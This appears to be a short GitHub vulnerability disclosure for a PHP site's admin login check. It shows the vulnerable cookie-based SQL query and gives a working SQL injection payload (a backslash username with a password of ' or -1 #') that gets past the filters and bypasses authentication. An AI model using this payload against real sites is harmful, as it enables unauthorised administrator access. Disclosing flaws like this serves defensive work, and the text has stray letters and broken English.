Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time

backstage_access_control


Vulnerabilities is exist \Include\contorl.php 128 line

f Function checkuser is Determine whether the user is logged in or not

In line 187

$query=$db_conn->query("select * from sc_user where user_admin='$cookieuseradmin' and user_ps='$cookieuserpass'");

Variables $cookieuseradmin and $cookieuserpass are obtained from cookies

And through test_input() and verify_str() two detection functions b c

So,Universal password "or 1 = 1" is not feasible. The equality sign is filtered in the verify_str function. But! Password "or-1" is OK,So the final payload is:

Payload:
select * from sc_user where user_admin='\' and user_ps=' or -1 #'

g